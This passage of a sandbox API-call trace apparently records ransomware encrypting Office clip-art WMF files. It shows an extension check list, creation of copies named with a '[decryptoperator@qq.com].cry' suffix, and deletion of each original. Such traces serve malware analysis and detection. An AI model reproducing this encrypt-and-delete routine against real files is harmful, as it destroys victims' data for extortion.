(lpString1=".ppt", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.489] lstrlenW (lpString=".zip") returned 4 [0052.489] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.489] lstrlenW (lpString=".rar") returned 4 [0052.489] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString=".bz2") returned 4 [0052.489] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString=".7z") returned 3 [0052.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.489] lstrlenW (lpString=".dbf") returned 4 [0052.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.489] lstrlenW (lpString=".1cd") returned 4 [0052.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.489] lstrlenW (lpString=".jpg") returned 4 [0052.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.500] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=3746) returned 1 [0052.500] CloseHandle (hObject=0x220) returned 1 [0052.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 0x20 [0052.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.501] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.501] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.501] GetLastError () returned 0x0 [0052.501] ReadFile (in: hFile=0x220, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xea2, lpOverlapped=0x0) returned 1 [0052.538] WriteFile (in: hFile=0x210, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xeb0, lpOverlapped=0x0) returned 1 [0052.815] ReadFile (in: hFile=0x220, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.815] WriteFile (in: hFile=0x210, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.815] SetEndOfFile (hFile=0x210) returned 1 [0052.815] CloseHandle (hObject=0x210) returned 1 [0052.815] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.815] SetEndOfFile (hFile=0x220) returned 1 [0052.816] CloseHandle (hObject=0x220) returned 1 [0052.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.818] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0052.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.818] lstrlenW (lpString=".doc") returned 4 [0052.818] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString=".docx") returned 5 [0052.819] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.819] lstrlenW (lpString=".pdf") returned 4 [0052.819] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString=".xls") returned 4 [0052.819] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.819] lstrlenW (lpString=".xlsx") returned 5 [0052.819] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.819] lstrlenW (lpString=".ppt") returned 4 [0052.819] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.819] lstrlenW (lpString=".zip") returned 4 [0052.819] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.819] lstrlenW (lpString=".rar") returned 4 [0052.819] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString=".bz2") returned 4 [0052.819] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString=".7z") returned 3 [0052.819] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.819] lstrlenW (lpString=".dbf") returned 4 [0052.819] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.819] lstrlenW (lpString=".1cd") returned 4 [0052.819] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0052.819] lstrlenW (lpString=".jpg") returned 4 [0052.819] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.988] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2636) returned 1 [0052.988] CloseHandle (hObject=0x1fc) returned 1 [0052.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 0x20 [0052.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0052.988] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.988] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.989] GetLastError () returned 0x0 [0052.989] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xa4c, lpOverlapped=0x0) returned 1 [0053.022] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0053.023] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.023] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.023] SetEndOfFile (hFile=0x1bc) returned 1 [0053.024] CloseHandle (hObject=0x1bc) returned 1 [0053.024] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.024] SetEndOfFile (hFile=0x1fc) returned 1 [0053.024] CloseHandle (hObject=0x1fc) returned 1 [0053.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0053.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.033] lstrlenW (lpString=".doc") returned 4 [0053.033] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.033] lstrlenW (lpString=".docx") returned 5 [0053.033] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.034] lstrlenW (lpString=".pdf") returned 4 [0053.034] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString=".xls") returned 4 [0053.034] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.034] lstrlenW (lpString=".xlsx") returned 5 [0053.034] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.034] lstrlenW (lpString=".ppt") returned 4 [0053.034] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.034] lstrlenW (lpString=".zip") returned 4 [0053.034] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.034] lstrlenW (lpString=".rar") returned 4 [0053.034] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString=".bz2") returned 4 [0053.034] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString=".7z") returned 3 [0053.034] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.034] lstrlenW (lpString=".dbf") returned 4 [0053.034] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.034] lstrlenW (lpString=".1cd") returned 4 [0053.034] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0053.034] lstrlenW (lpString=".jpg") returned 4 [0053.034] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.034] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.034] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.035] GetLastError () returned 0x0 [0053.035] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0053.173] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0053.174] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.174] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.174] SetEndOfFile (hFile=0x1bc) returned 1 [0053.174] CloseHandle (hObject=0x1bc) returned 1 [0053.175] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.175] SetEndOfFile (hFile=0x1fc) returned 1 [0053.175] CloseHandle (hObject=0x1fc) returned 1 [0053.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0053.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.176] lstrlenW (lpString=".doc") returned 4 [0053.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.176] lstrlenW (lpString=".docx") returned 5 [0053.176] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.176] lstrlenW (lpString=".pdf") returned 4 [0053.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.176] lstrlenW (lpString=".xls") returned 4 [0053.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.176] lstrlenW (lpString=".xlsx") returned 5 [0053.176] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.176] lstrlenW (lpString=".ppt") returned 4 [0053.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.176] lstrlenW (lpString=".zip") returned 4 [0053.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.176] lstrlenW (lpString=".rar") returned 4 [0053.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.176] lstrlenW (lpString=".bz2") returned 4 [0053.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.176] lstrlenW (lpString=".7z") returned 3 [0053.176] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.176] lstrlenW (lpString=".dbf") returned 4 [0053.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.177] lstrlenW (lpString=".1cd") returned 4 [0053.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0053.177] lstrlenW (lpString=".jpg") returned 4 [0053.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.177] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5004) returned 1 [0053.177] CloseHandle (hObject=0x1fc) returned 1 [0053.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 0x20 [0053.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0053.177] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.177] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.178] GetLastError () returned 0x0 [0053.178] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x138c, lpOverlapped=0x0) returned 1 [0053.209] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0053.210] ReadFile (in: hFile=0x1fc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.210] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.210] SetEndOfFile (hFile=0x1bc) returned 1 [0053.210] CloseHandle (hObject=0x1bc) returned 1 [0053.210] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.210] SetEndOfFile (hFile=0x1fc) returned 1 [0053.211] CloseHandle (hObject=0x1fc) returned 1 [0053.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.211] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0053.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.287] lstrlenW (lpString=".doc") returned 4 [0053.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.287] lstrlenW (lpString=".docx") returned 5 [0053.287] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.287] lstrlenW (lpString=".pdf") returned 4 [0053.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.287] lstrlenW (lpString=".xls") returned 4 [0053.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.287] lstrlenW (lpString=".xlsx") returned 5 [0053.287] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.287] lstrlenW (lpString=".ppt") returned 4 [0053.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.288] lstrlenW (lpString=".zip") returned 4 [0053.288] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.288] lstrlenW (lpString=".rar") returned 4 [0053.288] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.288] lstrlenW (lpString=".bz2") returned 4 [0053.288] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.288] lstrlenW (lpString=".7z") returned 3 [0053.288] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.288] lstrlenW (lpString=".dbf") returned 4 [0053.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.288] lstrlenW (lpString=".1cd") returned 4 [0053.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.288] lstrlenW (lpString=".jpg") returned 4 [0053.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.289] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.289] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0053.289] GetLastError () returned 0x0 [0053.289] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2d74, lpOverlapped=0x0) returned 1 [0053.355] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2d80, lpOverlapped=0x0) returned 1 [0053.364] ReadFile (in: hFile=0x204, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.364] WriteFile (in: hFile=0x194, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.364] SetEndOfFile (hFile=0x194) returned 1 [0053.409] CloseHandle (hObject=0x194) returned 1 [0053.409] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.409] SetEndOfFile (hFile=0x204) returned 1 [0053.410] CloseHandle (hObject=0x204) returned 1 [0053.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft 